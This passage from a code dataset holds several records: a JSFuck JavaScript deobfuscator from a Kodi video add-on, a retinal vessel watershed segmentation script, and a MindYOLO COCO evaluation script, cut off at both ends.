event_report_name = []\n event_report_quant = []\n\n for event_name in Config().events_list:\n log_captured = events_dir_path+'/'+event_name+'.txt'\n n = 0\n for line in open(log_captured):\n if len(line) > 2 and line.find('epoch')!=-1:\n n+=1\n event_report_name.append(str(event_name))\n event_report_quant.append(n)\n report = [event_report_name, event_report_quant]\n return 
report\n\n","repo_name":"mrmaxformax/android_framework","sub_path":"lib/adtLogParser.py","file_name":"adtLogParser.py","file_ext":"py","file_size_in_byte":8052,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"32692337539","text":"import re\nimport string\n\nfrom resources.lib.util import Quote, Unquote\n\n\nclass JSUnfuck(object):\n numbers = None\n words = {\n \"(![]+[])\": \"false\",\n \"([]+{})\": \"[object Object]\",\n \"(!![]+[])\": \"true\",\n \"([][[]]+[])\": \"undefined\",\n \"(+{}+[])\": \"NaN\",\n \"([![]]+[][[]])\": \"falseundefined\",\n \"([][f+i+l+t+e+r]+[])\": \"function filter() { [native code] }\",\n \"(!![]+[][f+i+l+t+e+r])\": \"truefunction filter() { [native code] }\",\n \"(+![]+([]+[])[c+o+n+s+t+r+u+c+t+o+r])\": \"0function String() { [native code] }\",\n \"(+![]+[![]]+([]+[])[c+o+n+s+t+r+u+c+t+o+r])\": \"0falsefunction String() { [native code] }\",\n \"([]+[][s+o+r+t][c+o+n+s+t+r+u+c+t+o+r](r+e+t+u+r+n+ +l+o+c+a+t+i+o+n)())\": \"https://123movies.to\",\n \"([]+[])[f+o+n+t+c+o+l+o+r]()\": '',\n \"(+(+!![]+e+1+0+0+0)+[])\": \"Infinity\",\n \"(+[![]]+[][f+i+l+t+e+r])\": 'NaNfunction filter() { [native code] }',\n '(+[![]]+[+(+!+[]+(!+[]+[])[3]+[1]+[0]+[0]+[0])])': 'NaNInfinity',\n '([]+[])[i+t+a+l+i+c+s]()': '',\n '[[]][c+o+n+c+a+t]([[]])+[]': ',',\n '([][f+i+l+l]+[])': 'function fill() { [native code]}',\n '(!![]+[][f+i+l+l])': 'truefunction fill() { [native code]}',\n '((+[])[c+o+n+s+t+r+u+c+t+o+r]+[])': 'function Number() {[native code]} _display:45:1',\n '(+(+!+[]+[1]+e+[2]+[0])+[])': '1.1e+21',\n '([]+[])[c+o+n+s+t+r+u+c+t+o+r][n+a+m+e]': 'S+t+r+i+n+g',\n '([][e+n+t+r+i+e+s]()+[])': '[object Array Iterator]',\n '([]+[])[l+i+n+k](\")': '',\n '(![]+[0])[i+t+a+l+i+c+s]()': 'false0',\n # dummy to force array dereference\n 'DUMMY1': '6p',\n 'DUMMY2': '2x',\n 'DUMMY3': '%3C',\n 'DUMMY4': '%5B',\n 'DUMMY5': '6q',\n 'DUMMY6': '4h',\n }\n\n uniqs = {\n '[t+o+S+t+r+i+n+g]': 1,\n '[][f+i+l+t+e+r][c+o+n+s+t+r+u+c+t+o+r](r+e+t+u+r+n+ +e+s+c+a+p+e)()': 2,\n '[][f+i+l+t+e+r][c+o+n+s+t+r+u+c+t+o+r](r+e+t+u+r+n+ +u+n+e+s+c+a+p+e)()': 3,\n '[][s+o+r+t][c+o+n+s+t+r+u+c+t+o+r](r+e+t+u+r+n+ +e+s+c+a+p+e)()': 2,\n '[][s+o+r+t][c+o+n+s+t+r+u+c+t+o+r](r+e+t+u+r+n+ +u+n+e+s+c+a+p+e)()': 3,\n }\n\n def __init__(self, js):\n self.js = js\n\n def decode(self, replace_plus=True):\n while True:\n start_js = self.js\n self.repl_words(self.words)\n self.repl_numbers()\n self.repl_arrays(self.words)\n self.repl_uniqs(self.uniqs)\n if start_js == self.js:\n break\n\n if replace_plus:\n self.js = self.js.replace('+', '')\n self.js = re.sub('\\[[A-Za-z]*\\]', '', self.js)\n self.js = re.sub('\\[(\\d+)\\]', '\\\\1', self.js)\n\n # foutu ici pr le moment\n self.js = self.js.replace('(+)', '0')\n self.js = self.js.replace('(+!!)', '1')\n\n return self.js\n\n def repl_words(self, words):\n while True:\n start_js = self.js\n for key, value in sorted(words.items(), key=lambda x: len(x[0]), reverse=True):\n self.js = self.js.replace(key, value)\n\n if self.js == start_js:\n break\n\n def repl_arrays(self, words):\n for word in sorted(words.values(), key=lambda x: len(x), reverse=True):\n for index in range(0, 100):\n try:\n repl = word[index]\n self.js = self.js.replace('%s[%d]' % (word, index), repl)\n except:\n pass\n\n def repl_numbers(self):\n if self.numbers is None:\n self.numbers = self.__gen_numbers()\n\n while True:\n start_js = self.js\n for key, value in sorted(self.numbers.items(), key=lambda x: len(x[0]), reverse=True):\n self.js = 
self.js.replace(key, value)\n\n if self.js == start_js:\n break\n\n def repl_uniqs(self, uniqs):\n for key, value in uniqs.items():\n if key in self.js:\n if value == 1:\n self.__handle_tostring()\n elif value == 2:\n self.__handle_escape(key)\n elif value == 3:\n self.__handle_unescape(key)\n\n def __handle_tostring(self):\n for match in re.finditer('(\\d+)\\[t\\+o\\+S\\+t\\+r\\+i\\+n\\+g\\](\\d+)', self.js):\n repl = to_base(match.group(1), match.group(2))\n self.js = self.js.replace(match.group(0), repl)\n\n def __handle_escape(self, key):\n while True:\n start_js = self.js\n offset = self.js.find(key) + len(key)\n if self.js[offset] == '(' and self.js[offset + 2] == ')':\n c = self.js[offset + 1]\n self.js = self.js.replace('%s(%s)' % (key, c), Quote(c))\n\n if start_js == self.js:\n break\n\n def __handle_unescape(self, key):\n start = 0\n while True:\n start_js = self.js\n offset = self.js.find(key, start)\n if offset == -1:\n break\n\n offset += len(key)\n expr = ''\n extra = ''\n last_c = self.js[offset - 1]\n abort = False\n for i, c in enumerate(self.js[offset:]):\n extra += c\n if c == ')':\n break\n elif (i > 0 and c == '(') or (c == '[' and last_c != '+'):\n abort = True\n break\n elif c == '%' or c in string.hexdigits:\n expr += c\n last_c = c\n\n if not abort:\n self.js = self.js.replace(key + extra, Unquote(expr))\n\n if start_js == self.js:\n break\n else:\n start = offset\n\n def __gen_numbers(self):\n n = {'(+[]+[])': '0', '(+![]+([]+[]))': '0', '[+[]]': '[0]',\n '(+!![]+[])': '1', '[+!+[]]': '[1]', '[+!![]]': '[1]',\n '[+!+[]+[+[]]]': '[10]', '+(1+1)': '11', '(+20)': '20'}\n\n for i in range(2, 20):\n key = '+!![]' * (i - 1)\n key = '!+[]' + key\n n['(' + key + ')'] = str(i)\n key += '+[]'\n n['(' + key + ')'] = str(i)\n n['[' + key + ']'] = '[' + str(i) + ']'\n\n for i in range(2, 10):\n key = '!+[]+' * (i - 1) + '!+[]'\n n['(' + key + ')'] = str(i)\n n['[' + key + ']'] = '[' + str(i) + ']'\n\n key = '!+[]' + '+!![]' * (i - 1)\n n['[' + key + ']'] = '[' + str(i) + ']'\n\n for i in range(0, 10):\n key = '(+(+!+[]+[%d]))' % (i)\n n[key] = str(i + 10)\n key = '[+!+[]+[%s]]' % (i)\n n[key] = '[' + str(i + 10) + ']'\n\n for tens in range(2, 10):\n for ones in range(0, 10):\n key = '!+[]+' * (tens) + '[%d]' % (ones)\n n['(' + key + ')'] = str(tens * 10 + ones)\n n['[' + key + ']'] = '[' + str(tens * 10 + ones) + ']'\n\n for hundreds in range(1, 10):\n for tens in range(0, 10):\n for ones in range(0, 10):\n key = '+!+[]' * hundreds + '+[%d]+[%d]))' % (tens, ones)\n if hundreds > 1:\n key = key[1:]\n key = '(+(' + key\n n[key] = str(hundreds * 100 + tens * 10 + ones)\n return n\n\n\ndef to_base(n, base, digits=\"0123456789abcdefghijklmnopqrstuvwxyz\"):\n n, base = int(n), int(base)\n if n < base:\n return digits[n]\n else:\n return to_base(n // base, base, digits).lstrip(digits[0]) + digits[n % base]\n","repo_name":"Kodi-vStream/venom-xbmc-addons","sub_path":"plugin.video.vstream/resources/lib/jsunfuck.py","file_name":"jsunfuck.py","file_ext":"py","file_size_in_byte":7686,"program_lang":"python","lang":"en","doc_type":"code","stars":456,"dataset":"github-code","pt":"37"} +{"seq_id":"43604152998","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Mar 3 22:37:02 2018\r\n\r\n@author: yeshwanth R\r\n\"\"\"\r\nfrom sys import exit\r\nfrom scipy import ndimage as ndi\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom skimage.morphology import watershed, disk\r\nfrom skimage import data\r\nfrom skimage.io import imread\r\nfrom skimage.filters import rank\r\nfrom skimage.color 
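# ---------------------------------------------------------------------------
# Editor's sketch (not from the original repo): to_base() above mirrors
# JavaScript's Number.prototype.toString(radix), which the deobfuscator needs
# for JSFuck patterns like (255)[t+o+S+t+r+i+n+g](16). Quick sanity checks,
# assuming to_base() from jsunfuck.py above is in scope:
assert to_base(255, 16) == 'ff'   # parallels (255).toString(16) in JS
assert to_base(7, 2) == '111'
assert to_base(35, 36) == 'z'
# ---------------------------------------------------------------------------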
import rgb2gray\r\nfrom skimage.util import img_as_ubyte\r\nimport cv2\r\nimport os\r\nimport numpy as np\r\nimage = cv2.imread('25_training.tif')\r\nkernel = np.ones((2,2), np.uint8)\r\nkernel1 = np.ones((7,7), np.uint8)\r\nkernel2 = np.ones((7,7), np.uint8)\r\ng = image.copy()\r\nclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\r\n# set blue and red channels to 0\r\ng[:, :, 0] = 0\r\ng[:, :, 2] = 0\r\nimg_grey = cv2.cvtColor(g, cv2.COLOR_BGR2GRAY)\r\nimg_grey=(255-img_grey)\r\n\r\ncl1 = clahe.apply(img_grey)\r\ncl1 = cv2.dilate(cl1,kernel,iterations = 1)\r\n\r\n#cv2.imshow(\"op3\",cl1)\r\nerosion = cv2.erode(cl1,kernel1,iterations = 1)\r\n\r\nerosion=cv2.GaussianBlur(erosion,(5,5),0)\r\nerosion=cv2.blur(erosion,(5,5),0)\r\n#erosion = cv2.medianBlur(cl1,1)\r\n#opening = cv2.morphologyEx(cl1, cv2.MORPH_OPEN, kernel)\r\n#cv2.imshow(\"op2\",erosion)\r\n#cv2.normalize(opening, opening, 0, 255, cv2.NORM_MINMAX)\r\n#opening=(255-opening)\r\nx=cv2.subtract(cl1,erosion)\r\nx = cv2.medianBlur(x,5)\r\ncv2.imshow(\"x\",x)\r\nx1 = cv2.morphologyEx(x, cv2.MORPH_OPEN, kernel2)\r\n#cv2.imshow(\"op1\",x1)\r\nx2=cv2.subtract(x,x1)\r\ncv2.imshow(\"x2\",x2)\r\nx3 = cv2.morphologyEx(x2, cv2.MORPH_OPEN, kernel2)\r\nx4=cv2.subtract(x2,x3)\r\nx5=cv2.add(x2,x4)\r\ncv2.imshow(\"x5\",x5)\r\n\r\nimage1 = img_as_ubyte(x5)\r\nmarkers = rank.gradient(image1, disk(5)) < 20\r\nmarkers = ndi.label(markers)[0]\r\n\r\ngradient = rank.gradient(image1, disk(2))\r\n\r\nlabels = watershed(gradient, markers)\r\n\r\nfig, axes = plt.subplots(nrows=2, ncols=2, figsize=(8,8), sharex=True,\r\n sharey=True, subplot_kw={'adjustable':'box-forced'})\r\n\r\nax = axes.ravel()\r\n\r\nax[0].imshow(image, cmap=plt.cm.gray, interpolation='nearest')\r\nax[0].set_title(\"Original\")\r\n\r\nax[1].imshow(gradient, cmap=plt.cm.spectral, interpolation='nearest')\r\nax[1].set_title(\"Local Gradient\")\r\n\r\nax[2].imshow(markers, cmap=plt.cm.spectral, interpolation='nearest')\r\nax[2].set_title(\"Markers\")\r\n\r\nax[3].imshow(image, cmap=plt.cm.gray, interpolation='nearest')\r\nax[3].imshow(labels, cmap=plt.cm.spectral, interpolation='nearest',alpha=.7)\r\n\r\nax[3].set_title(\"segmented\")\r\n\r\nfor a in ax:\r\n a.axis('off')\r\n \r\n fig.tight_layout()\r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#edges = cv2.Canny(x5,10,100)\r\n#cv2.imshow(\"edges\",edges)\r\n#abc=cv2.subtract(x5,edges)\r\n#cv2.imshow(\"abc\",abc)\r\n#cv2.waitKey(0)\r\n\r\n\r\n\r\n","repo_name":"yeshwanthramakrishna98/novel-blood-vessel-segmentation-for-retinal-fundus-image","sub_path":"untitled1.py","file_name":"untitled1.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20485566767","text":"import argparse\nimport ast\nimport contextlib\nimport json\nimport os\nimport time\nimport yaml\nimport numpy as np\nfrom typing import Union\nfrom pathlib import Path\nfrom multiprocessing.pool import ThreadPool\nfrom pycocotools.coco import COCO\nfrom pycocotools.mask import encode\n\nimport mindspore as ms\nfrom mindspore import Tensor, context, nn, ParallelMode\nfrom mindspore.communication import init, get_rank, get_group_size\n\nfrom mindyolo.data import COCO80_TO_COCO91_CLASS, COCODataset, create_loader\nfrom mindyolo.models.model_factory import create_model\nfrom mindyolo.utils import logger, get_logger\nfrom mindyolo.utils.config import parse_args\nfrom mindyolo.utils.metrics import 
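# ---------------------------------------------------------------------------
# Editor's sketch (not from the original repo): a minimal, self-contained
# marker-based watershed pipeline in the spirit of the script above, using the
# same imports it declares (newer scikit-image moves watershed to
# skimage.segmentation). The input is a dummy grayscale image.
import numpy as np
from scipy import ndimage as ndi
from skimage.filters import rank
from skimage.morphology import watershed, disk
from skimage.util import img_as_ubyte

gray = img_as_ubyte(np.random.rand(64, 64))   # stand-in for the vessel image
markers = rank.gradient(gray, disk(5)) < 20   # flat regions become seeds
markers = ndi.label(markers)[0]               # unique integer id per seed
gradient = rank.gradient(gray, disk(2))       # edges show up as high gradient
labels = watershed(gradient, markers)         # flood from seeds along gradient
# ---------------------------------------------------------------------------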
non_max_suppression, scale_coords, xyxy2xywh, scale_image, process_mask_upsample\nfrom mindyolo.utils.utils import set_seed, get_broadcast_datetime, Synchronizer\n\n\ndef get_parser_test(parents=None):\n parser = argparse.ArgumentParser(description=\"Test\", parents=[parents] if parents else [])\n parser.add_argument(\"--task\", type=str, default=\"detect\", choices=[\"detect\", \"segment\"])\n parser.add_argument(\"--device_target\", type=str, default=\"Ascend\", help=\"device target, Ascend/GPU/CPU\")\n parser.add_argument(\"--ms_mode\", type=int, default=0, help=\"train mode, graph/pynative\")\n parser.add_argument(\"--ms_amp_level\", type=str, default=\"O0\", help=\"amp level, O0/O1/O2\")\n parser.add_argument(\n \"--ms_enable_graph_kernel\", type=ast.literal_eval, default=False, help=\"use enable_graph_kernel or not\"\n )\n parser.add_argument(\"--weight\", type=str, default=\"yolov7_300.ckpt\", help=\"model.ckpt path(s)\")\n parser.add_argument(\"--per_batch_size\", type=int, default=32, help=\"size of each image batch\")\n parser.add_argument(\"--img_size\", type=int, default=640, help=\"inference size (pixels)\")\n parser.add_argument(\n \"--single_cls\", type=ast.literal_eval, default=False, help=\"train multi-class data as single-class\"\n )\n parser.add_argument(\"--rect\", type=ast.literal_eval, default=False, help=\"rectangular training\")\n parser.add_argument(\"--nms_time_limit\", type=float, default=60.0, help=\"time limit for NMS\")\n parser.add_argument(\"--conf_thres\", type=float, default=0.001, help=\"object confidence threshold\")\n parser.add_argument(\"--iou_thres\", type=float, default=0.65, help=\"IOU threshold for NMS\")\n parser.add_argument(\n \"--conf_free\", type=ast.literal_eval, default=False, help=\"Whether the prediction result include conf\"\n )\n parser.add_argument(\"--seed\", type=int, default=2, help=\"set global seed\")\n parser.add_argument(\"--log_level\", type=str, default=\"INFO\", help=\"save dir\")\n parser.add_argument(\"--save_dir\", type=str, default=\"./runs_test\", help=\"save dir\")\n\n # args for ModelArts\n parser.add_argument(\"--enable_modelarts\", type=ast.literal_eval, default=False, help=\"enable modelarts\")\n parser.add_argument(\"--data_url\", type=str, default=\"\", help=\"ModelArts: obs path to dataset folder\")\n parser.add_argument(\"--ckpt_url\", type=str, default=\"\", help=\"ModelArts: obs path to checkpoint folder\")\n parser.add_argument(\"--train_url\", type=str, default=\"\", help=\"ModelArts: obs path to dataset folder\")\n parser.add_argument(\n \"--data_dir\", type=str, default=\"/cache/data/\", help=\"ModelArts: local device path to dataset folder\"\n )\n parser.add_argument(\"--is_parallel\", type=ast.literal_eval, default=False, help=\"Distribute test or not\")\n parser.add_argument(\n \"--ckpt_dir\",\n type=str,\n default=\"/cache/pretrain_ckpt/\",\n help=\"ModelArts: local device path to checkpoint folder\",\n )\n return parser\n\n\ndef set_default_test(args):\n # Set Context\n context.set_context(mode=args.ms_mode, device_target=args.device_target, max_call_depth=2000)\n if args.device_target == \"Ascend\":\n context.set_context(device_id=int(os.getenv(\"DEVICE_ID\", 0)))\n elif args.device_target == \"GPU\" and args.ms_enable_graph_kernel:\n context.set_context(enable_graph_kernel=True)\n # Set Parallel\n if args.is_parallel:\n init()\n args.rank, args.rank_size, parallel_mode = get_rank(), get_group_size(), ParallelMode.DATA_PARALLEL\n context.set_auto_parallel_context(device_num=args.rank_size, 
parallel_mode=parallel_mode)\n else:\n args.rank, args.rank_size = 0, 1\n # Set Data\n args.data.nc = 1 if args.single_cls else int(args.data.nc) # number of classes\n args.data.names = [\"item\"] if args.single_cls and len(args.names) != 1 else args.data.names # class names\n assert len(args.data.names) == args.data.nc, \"%g names found for nc=%g dataset in %s\" % (\n len(args.data.names),\n args.data.nc,\n args.config,\n )\n # Directories and Save run settings\n time = get_broadcast_datetime(rank_size=args.rank_size)\n args.save_dir = os.path.join(\n args.save_dir, f'{time[0]:04d}.{time[1]:02d}.{time[2]:02d}-{time[3]:02d}.{time[4]:02d}.{time[5]:02d}')\n os.makedirs(args.save_dir, exist_ok=True)\n if args.rank % args.rank_size == 0:\n with open(os.path.join(args.save_dir, \"cfg.yaml\"), \"w\") as f:\n yaml.dump(vars(args), f, sort_keys=False)\n # Set Logger\n logger.setup_logging(logger_name=\"MindYOLO\", log_level=\"INFO\", rank_id=args.rank, device_per_servers=args.rank_size)\n logger.setup_logging_file(log_dir=os.path.join(args.save_dir, \"logs\"))\n # Modelarts: Copy data, from the s3 bucket to the computing node; Reset dataset dir.\n if args.enable_modelarts:\n from mindyolo.utils.modelarts import sync_data\n\n os.makedirs(args.data_dir, exist_ok=True)\n sync_data(args.data_url, args.data_dir)\n sync_data(args.save_dir, args.train_url)\n if args.ckpt_url:\n sync_data(args.ckpt_url, args.ckpt_dir) # pretrain ckpt\n # args.data.dataset_dir = os.path.join(args.data_dir, args.data.dataset_dir)\n args.data.val_set = os.path.join(args.data_dir, args.data.val_set)\n args.data.test_set = os.path.join(args.data_dir, args.data.test_set)\n args.weight = args.ckpt_dir if args.ckpt_dir else \"\"\n\n\ndef test(task, **kwargs):\n if task == \"detect\":\n return test_detect(**kwargs)\n elif task == \"segment\":\n return test_segment(**kwargs)\n\n\ndef test_detect(\n network: nn.Cell,\n dataloader: ms.dataset.Dataset,\n anno_json_path: str,\n conf_thres: float = 0.001,\n iou_thres: float = 0.65,\n conf_free: bool = False,\n num_class: int = 80,\n nms_time_limit: float = -1.0,\n is_coco_dataset: bool = True,\n imgIds: list = [],\n per_batch_size: int = -1,\n rank: int = 0,\n rank_size: int = 1,\n save_dir: str = '',\n synchronizer: Synchronizer = None,\n cur_epoch: Union[str, int] = 0, # to distinguish saving directory from different epoch in eval while run mode\n):\n try:\n from mindyolo.csrc import COCOeval_fast as COCOeval\n except ImportError:\n logger.warning(f'unable to load fast_coco_eval api, use normal one instead')\n from pycocotools.cocoeval import COCOeval\n\n steps_per_epoch = dataloader.get_dataset_size()\n loader = dataloader.create_dict_iterator(output_numpy=True, num_epochs=1)\n coco91class = COCO80_TO_COCO91_CLASS\n\n sample_num = 0\n infer_times = 0.0\n nms_times = 0.0\n result_dicts = []\n\n for i, data in enumerate(loader):\n imgs, paths, ori_shape, pad, hw_scale = (\n data[\"images\"],\n data[\"img_files\"],\n data[\"hw_ori\"],\n data[\"pad\"],\n data[\"hw_scale\"],\n )\n nb, _, height, width = imgs.shape\n imgs = Tensor(imgs, ms.float32)\n\n # Run infer\n _t = time.time()\n out, _ = network(imgs) # inference and training outputs\n infer_times += time.time() - _t\n\n # Run NMS\n t = time.time()\n out = out.asnumpy()\n out = non_max_suppression(\n out,\n conf_thres=conf_thres,\n iou_thres=iou_thres,\n conf_free=conf_free,\n multi_label=True,\n time_limit=nms_time_limit,\n )\n nms_times += time.time() - t\n\n # Statistics pred\n for si, pred in enumerate(out):\n path = 
Path(str(paths[si]))\n sample_num += 1\n if len(pred) == 0:\n continue\n\n # Predictions\n predn = np.copy(pred)\n scale_coords(\n imgs[si].shape[1:], predn[:, :4], ori_shape[si], ratio=hw_scale[si], pad=pad[si]\n ) # native-space pred\n\n image_id = int(path.stem) if path.stem.isnumeric() else path.stem\n box = xyxy2xywh(predn[:, :4]) # xywh\n box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner\n for p, b in zip(pred.tolist(), box.tolist()):\n result_dicts.append(\n {\n \"image_id\": image_id,\n \"category_id\": coco91class[int(p[5])] if is_coco_dataset else int(p[5]),\n \"bbox\": [round(x, 3) for x in b],\n \"score\": round(p[4], 5),\n }\n )\n logger.info(f\"Sample {steps_per_epoch}/{i + 1}, time cost: {(time.time() - _t) * 1000:.2f} ms.\")\n\n # save and load result file for distributed case\n if rank_size > 1:\n # save result to file\n # each epoch has a unique directory in eval while run mode\n infer_dir = os.path.join(save_dir, 'infer', str(cur_epoch))\n os.makedirs(infer_dir, exist_ok=True)\n infer_path = os.path.join(infer_dir, f'det_result_rank{rank}_{rank_size}.json')\n with open(infer_path, 'w') as f:\n json.dump(result_dicts, f)\n # synchronize\n assert synchronizer is not None\n synchronizer()\n\n # load file to result_dicts\n f_names = os.listdir(infer_dir)\n f_paths = [os.path.join(infer_dir, f) for f in f_names]\n logger.info(f\"Loading {len(f_names)} eval file from directory {infer_dir}: {sorted(f_names)}.\")\n assert len(f_names) == rank_size, f'number of eval file({len(f_names)}) should be equal to rank size({rank_size})'\n result_dicts = []\n for path in f_paths:\n with open(path, 'r') as fp:\n result_dicts += json.load(fp)\n\n # Compute mAP\n if not result_dicts:\n logger.warning(f'Got 0 bbox after NMS, skip computing map')\n map, map50 = 0.0, 0.0\n else:\n try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb\n with contextlib.redirect_stdout(get_logger()): # redirect stdout to logger\n anno = COCO(anno_json_path) # init annotations api\n pred = anno.loadRes(result_dicts) # init predictions api\n eval = COCOeval(anno, pred, \"bbox\")\n if is_coco_dataset:\n eval.params.imgIds = imgIds\n eval.evaluate()\n eval.accumulate()\n eval.summarize()\n map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)\n except Exception as e:\n logger.error(f\"pycocotools unable to run: {e}\")\n raise e\n\n t = tuple(x / sample_num * 1E3 for x in (infer_times, nms_times, infer_times + nms_times)) + \\\n (height, width, per_batch_size) # tuple\n logger.info(f'Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g;' % t)\n\n return map, map50\n\n\ndef test_segment(\n network: nn.Cell,\n dataloader: ms.dataset.Dataset,\n anno_json_path: str,\n conf_thres: float = 0.001,\n iou_thres: float = 0.65,\n conf_free: bool = False,\n num_class: int = 80,\n nms_time_limit: float = -1.0,\n is_coco_dataset: bool = True,\n imgIds: list = [],\n per_batch_size: int = -1,\n rank: int = 0,\n rank_size: int = 1,\n save_dir: str = '',\n synchronizer: Synchronizer = None,\n cur_epoch: Union[str, int] = 0, # to distinguish saving directory from different epoch in eval while run mode\n):\n try:\n from mindyolo.csrc import COCOeval_fast as COCOeval\n except ImportError:\n logger.warning(f'unable to load fast_coco_eval api, use normal one instead')\n from pycocotools.cocoeval import COCOeval\n\n steps_per_epoch = dataloader.get_dataset_size()\n loader = dataloader.create_dict_iterator(output_numpy=True, num_epochs=1)\n coco91class = 
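# ---------------------------------------------------------------------------
# Editor's sketch (not from the original repo): test_detect() above calls
# xyxy2xywh() and then shifts the xy *center* to the top-left corner, because
# COCO result files store boxes as [x_min, y_min, width, height]. The same
# conversion written out directly (hypothetical numpy helper):
import numpy as np

def xyxy_to_coco(boxes_xyxy: np.ndarray) -> np.ndarray:
    """[x1, y1, x2, y2] -> [x_min, y_min, w, h] as used by COCO."""
    out = boxes_xyxy.astype(float).copy()
    out[:, 2] = boxes_xyxy[:, 2] - boxes_xyxy[:, 0]  # width
    out[:, 3] = boxes_xyxy[:, 3] - boxes_xyxy[:, 1]  # height
    return out

# xyxy_to_coco(np.array([[10., 20., 30., 60.]])) -> [[10., 20., 20., 40.]]
# ---------------------------------------------------------------------------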
COCO80_TO_COCO91_CLASS\n\n sample_num = 0\n infer_times = 0.0\n nms_times = 0.0\n result_dicts = []\n\n for i, data in enumerate(loader):\n imgs, paths, ori_shape, pad, hw_scale = (\n data[\"images\"],\n data[\"img_files\"],\n data[\"hw_ori\"],\n data[\"pad\"],\n data[\"hw_scale\"],\n )\n nb, _, height, width = imgs.shape\n imgs = Tensor(imgs, ms.float32)\n\n # Run infer\n _t = time.time()\n out, (_, _, prototypes) = network(imgs) # inference and training outputs\n infer_times += time.time() - _t\n\n # Run NMS\n t = time.time()\n _c = num_class + 4 if conf_free else num_class + 5\n out = out.asnumpy()\n bboxes, mask_coefficient = out[:, :, :_c], out[:, :, _c:]\n out = non_max_suppression(\n bboxes,\n mask_coefficient,\n conf_thres=conf_thres,\n iou_thres=iou_thres,\n conf_free=conf_free,\n multi_label=True,\n time_limit=nms_time_limit,\n )\n nms_times += time.time() - t\n\n p = prototypes.asnumpy()\n\n # Statistics pred\n for si, (pred, proto) in enumerate(zip(out, p)):\n path = Path(str(paths[si]))\n sample_num += 1\n if len(pred) == 0:\n continue\n\n # Predictions\n pred_masks = process_mask_upsample(proto, pred[:, 6:], pred[:, :4], shape=imgs[si].shape[1:])\n pred_masks = pred_masks.astype('float32')\n pred_masks = scale_image(pred_masks.transpose(1, 2, 0), ori_shape[si], pad=pad[si])\n predn = np.copy(pred)\n scale_coords(\n imgs[si].shape[1:], predn[:, :4], ori_shape[si], ratio=hw_scale[si], pad=pad[si]\n ) # native-space pred\n\n def single_encode(x):\n \"\"\"Encode predicted masks as RLE and append results to jdict.\"\"\"\n rle = encode(np.asarray(x[:, :, None], order='F', dtype='uint8'))[0]\n rle['counts'] = rle['counts'].decode('utf-8')\n return rle\n\n image_id = int(path.stem) if path.stem.isnumeric() else path.stem\n box = xyxy2xywh(predn[:, :4]) # xywh\n box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner\n pred_masks = np.transpose(pred_masks, (2, 0, 1))\n rles = []\n for _i in range(pred_masks.shape[0]):\n rles.append(single_encode(pred_masks[_i]))\n for j, (p, b) in enumerate(zip(pred.tolist(), box.tolist())):\n result_dicts.append(\n {\n \"image_id\": image_id,\n \"category_id\": coco91class[int(p[5])] if is_coco_dataset else int(p[5]),\n \"bbox\": [round(x, 3) for x in b],\n \"score\": round(p[4], 5),\n \"segmentation\": rles[j]\n }\n )\n logger.info(f\"Sample {steps_per_epoch}/{i + 1}, time cost: {(time.time() - _t) * 1000:.2f} ms.\")\n\n # save and load result file for distributed case\n if rank_size > 1:\n # save result to file\n # each epoch has a unique directory in eval while run mode\n infer_dir = os.path.join(save_dir, 'infer', str(cur_epoch))\n os.makedirs(infer_dir, exist_ok=True)\n infer_path = os.path.join(infer_dir, f'det_result_rank{rank}_{rank_size}.json')\n with open(infer_path, 'w') as f:\n json.dump(result_dicts, f)\n # synchronize\n assert synchronizer is not None\n synchronizer()\n\n # load file to result_dicts\n f_names = os.listdir(infer_dir)\n f_paths = [os.path.join(infer_dir, f) for f in f_names]\n logger.info(f\"Loading {len(f_names)} eval file from directory {infer_dir}: {sorted(f_names)}.\")\n assert len(f_names) == rank_size, f'number of eval file({len(f_names)}) should be equal to rank size({rank_size})'\n result_dicts = []\n for path in f_paths:\n with open(path, 'r') as fp:\n result_dicts += json.load(fp)\n\n # Compute mAP\n if not result_dicts:\n logger.warning(f'Got 0 bbox after NMS, skip computing map')\n map_bbox, map50_bbox, map_mask, map50_mask = 0.0, 0.0, 0.0, 0.0\n else:\n try: # 
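# ---------------------------------------------------------------------------
# Editor's sketch (not from the original repo): single_encode() above stores
# predicted masks as COCO run-length encodings. A tiny roundtrip with the same
# pycocotools calls on a dummy mask; encode() requires Fortran-order uint8.
import numpy as np
from pycocotools import mask as mask_utils

m = np.zeros((4, 4), dtype=np.uint8)
m[1:3, 1:3] = 1
rle = mask_utils.encode(np.asfortranarray(m))  # {'size': [4, 4], 'counts': ...}
assert mask_utils.area(rle) == 4
assert (mask_utils.decode(rle) == m).all()
# ---------------------------------------------------------------------------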
https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb\n print(\"Object detection:\")\n with contextlib.redirect_stdout(get_logger()): # redirect stdout to logger\n anno = COCO(anno_json_path) # init annotations api\n pred = anno.loadRes(result_dicts) # init predictions api\n eval = COCOeval(anno, pred, \"bbox\")\n if is_coco_dataset:\n eval.params.imgIds = imgIds\n eval.evaluate()\n eval.accumulate()\n eval.summarize()\n map_bbox, map50_bbox = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)\n print('\\n')\n print(\"Instance segmentation:\")\n with contextlib.redirect_stdout(get_logger()): # redirect stdout to logger\n anno = COCO(anno_json_path) # init annotations api\n pred = anno.loadRes(result_dicts) # init predictions api\n eval = COCOeval(anno, pred, \"segm\")\n if is_coco_dataset:\n eval.params.imgIds = imgIds\n eval.evaluate()\n eval.accumulate()\n eval.summarize()\n map_mask, map50_mask = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)\n except Exception as e:\n logger.error(f\"pycocotools unable to run: {e}\")\n raise e\n\n t = tuple(x / sample_num * 1E3 for x in (infer_times, nms_times, infer_times + nms_times)) + \\\n (height, width, per_batch_size) # tuple\n logger.info(f'Speed: %.1f/%.1f/%.1f 